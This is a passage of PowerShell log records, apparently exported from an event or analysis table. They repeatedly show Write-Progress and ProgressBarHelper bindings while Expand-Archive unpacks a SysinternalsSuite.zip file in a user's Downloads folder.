ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="303"
 
-RECORD 13----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 14----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="302"
 
-RECORD 15----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 16----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="301"
 
-RECORD 17----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 18----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="300"
 
-RECORD 19----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 20----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="299"
 
-RECORD 21----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 22----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="298"
 
-RECORD 23----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 24----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="297"
 
-RECORD 25----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 26----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="296"
 
-RECORD 27----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 28----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="295"
 
-RECORD 29----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 30----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="294"
 
-RECORD 31----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 32----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="293"
 
-RECORD 33----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 34----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="292"
 
-RECORD 35----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 36----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="291"
 
-RECORD 37----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 38----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="290"
 
-RECORD 39----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 40----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="289"
 
-RECORD 41----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 42----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="288"
 
-RECORD 43----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 44----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="287"
 
-RECORD 45----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 46----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="286"
 
-RECORD 47----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 48----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="285"
 
-RECORD 49----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 50----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="284"
 
-RECORD 51----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 52----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="283"
 
-RECORD 53----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 54----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="282"
 
-RECORD 55----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 56----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
